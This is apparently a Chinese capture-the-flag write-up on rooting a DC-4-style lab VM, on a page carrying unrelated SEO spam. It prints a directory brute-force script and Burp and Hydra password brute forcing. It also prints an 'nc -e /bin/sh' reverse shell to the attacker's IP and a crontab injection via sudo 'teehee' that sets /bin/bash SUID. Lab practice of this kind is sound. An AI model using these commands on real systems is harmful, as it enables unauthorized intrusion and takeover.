当前位置: 首页 > news >正文

网站排名点击工具w网站开发文献

网站排名点击工具,w网站开发文献,域名关键词查询,做网站播放未上映的电影是侵权吗文章目录 1. 靶场搭建2. 信息收集2.1 确定靶机ip2.2 主机信息收集2.3 主机目录探测 3. 渗透过程3.1 sql注入检测3.2 burp爆破3.3 反弹shell3.4 提权 4. 总结 1. 靶场搭建 靶场源地址 检验下载文件的检验码#xff0c;对比没问题使用vmware打开 # windwos 命令 Get-FileHash … 文章目录 1. 靶场搭建2. 信息收集2.1 确定靶机ip2.2 主机信息收集2.3 主机目录探测 3. 渗透过程3.1 sql注入检测3.2 burp爆破3.3 反弹shell3.4 提权 4. 总结 1. 靶场搭建 靶场源地址 检验下载文件的检验码对比没问题使用vmware打开 # windwos 命令 Get-FileHash filePath -Algorithm MD5 # linux md5sum filepath2. 信息收集 2.1 确定靶机ip 根据虚拟机网络适配器模式确定靶机所在网段。使用nmap进行网段存活主机排除法确定靶机ip. nmap -sn 192.168.6.100/24 通过排除法确定靶机ip为192.168.6.100 2.2 主机信息收集 通过nmap探测靶机开放端口和端口对应服务 nmap -Ap 1-65535 192.168.6.100 确定开放端口: 22:ssh服务80: http服务 2.3 主机目录探测 import queue import requests import threading import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) AGENT Mozilla/5.0 (X11; Linux x86_64; rv:19.0)Gecko/20100101 Firefox/19.0 # EXTENSIONS [.php, .bak, .orig, .inc] TARGET http://192.168.6.100 THREADS 8 WORDLIST ./all.txt words queue.Queue 读取字典文件生成扫描内容 def get_words(resumeNone): words queue.Queue() def extend_words(word): if . in word: words.put(f/{word}) else: words.put(f/{word}/) # for extension in EXTENSIONS: # words.put(f/{word}{extension}) with open(WORDLIST) as f: raw_words f.read() found_resume False for word in raw_words.split(): if resume is not None: if found_resume: extend_words(word) elif word resume: found_resume True else: extend_words(word) return words 暴力扫描 def dir_bruter(words): headers {User-Agent:AGENT} session requests.Session() session.verify False session.get(TARGET, headers headers) while not words.empty(): url f{TARGET}{words.get()} try: r session.get(url) except requests.exceptions.ConnectionError as e: # print(e) continue if r.status_code ! 404: print(url) if __name__ __main__: words get_words() for _ in range(THREADS): t threading.Thread(targetdir_bruter, args(words,)) t.start()3. 渗透过程 3.1 sql注入检测 访问web页面发现只有一个登录界面. 尝试使用sqlmap进行sql注入点检测,发现不存在注入点。 sqlmap -u http://192.168.6.100/login.php?usernameadminpasswordadmin3.2 burp爆破 尝试使用burp进行弱密码爆破,由于账号和密码都不知道使用cluster boomb模式选择爆破字典。 各种攻击模式的区别 【sinper】对单一参数进行密码爆破【battering ram】对所有参数进行同一个变量爆破如用户名和密码一样【pitchfork】对所有参数进行一一对应爆破传递两个参数两个字典一一对应。【cluster bomb】对参数进行交叉爆破常用用于不知道账号密码的情况 爆破成功账号为admin,密码为happy,成功登录 3.3 反弹shell 发现网站存在功能可以直接让服务器直接前端请求执行的命令。修改请求包命令进行反弹shell。 使用burp将请求拦截将参数radio改为nc -e /bin/sh 192.168.6.101 8888,kali使用nc进行监听 # 开启监听 nc -lvp 8888反弹shell成功 # 创建一个伪终端提高命令窗口交互 python -c import pty; pty.spawn(/bin/bash)3.4 提权 使用SUID进行提权 # 获取设置suid的文件 find / -type f -perm -4000 2/dev/null发现/home/jim/test.sh文件使用ls查看文件权限设置。查看文件内容之后发现无法利用这个文件切换到jim用户.设置suid的文件在发生变更时suid标志会被撤销无果。 ls -l /home/jim/test.sh尝试过sudo提权、搜索内核版本漏洞、crontab定时任务、/etc/passwd也没有发现利用的点。转变思路在系统中查看是否有可利用的文件。 在jim目录下找到jim的旧密码记录文件尝试进行ssh爆破。成功获取到密码jibril04.使用ssh成功登录。 # 使用hydra进行爆破 hydra -l jim -P dc4.txt ssh://192.168.6.100:22发现有一个邮件查看cat /var/mail/jim获取邮件获取到charles的密码切换用户 切换用户之后继续尝试sudo提权发现存在/usr/bin/teehee被设置为无密码使用。 # 获取teehee的帮助信息了解这个命令 teehee --helpteehee是将标准输入写入到某个文件中的一个命令。 我们可以利用这个命令去写入一个定时任务将/bin/bash权限设置为4777。 echo * * * * * root chmod 4777 /bin/bash | sudo teehee -a /etc/crontab接下来执行/bin/bash发现并没有提权猜测受到环境变量或者配置文件的限制。采用/bin/bash -p进行尝试-p参数使用保护模式启动保护模式下会忽略一些环境变量和配置文件成功提权。 成功获取flag 4. 总结 本次靶场利用到的技能: namp进行信息收集burp suite利用字典进行账号密码爆破篡改发送包参数。hydra进行ssh字典密码爆破sudo配合定时任务提权。
http://www.hkea.cn/news/14553959/

相关文章:

  • ps怎么做网站设计17做网店广州货源网
  • 江苏宜安建设有限公司网站免费的h5制作工具
  • 莞城网站建设公司大连建设工程设计院有限公司网站
  • 手机app开发网站建设网页制作专业软件有哪些
  • 网站空间不足wordpress上传logo
  • 网站二级域名建站属于子站吗晋城做网站
  • 如何做国外网站推广微信营销案例分析
  • 网站固定通栏代码精品一卡2卡三卡4卡二百信息网
  • 鑫鼎信长春网站建设wordpress 相册模板
  • 建设个直播网站要多少钱建立网站难吗
  • 快速做网站的技术wordpress wp super
  • 制作一个网站怎么做的wordpress首页生成静态
  • 科技公司建设网站公司餐饮 网站模板
  • 海关申报网站怎么做建站行业获客
  • c 网站开发模板批量修改wordpress文章分类目录
  • 网站 支持建设单位十六局门户网
  • 湛江网站建设方案服务小程序开发公司简介
  • 移动端的网站建设s吗网站虚拟主机
  • 网站搭建思路二级域名网站可以做360推广
  • 百度地图网站开发自己写的网页怎么发布到网上
  • 什么是cms网站系统怎样注册电商平台成为卖家
  • 物流网站建设方案范文域名被锁定网站打不开怎么办
  • 怎样建设手机网站域名主机网站导航
  • 网站首页优化的目的用户中心wordpress
  • 什么网站系统好无锡app定制
  • 哪个网站能帮助做试卷wordpress 邮件
  • 坐什么网站能用到html5网站开发怎么收费
  • 平台网站功能潍坊做网站潍坊做网站
  • 怎么网站wordpress中category参数
  • 城市建设网站鹤岗市免费注册126免费邮箱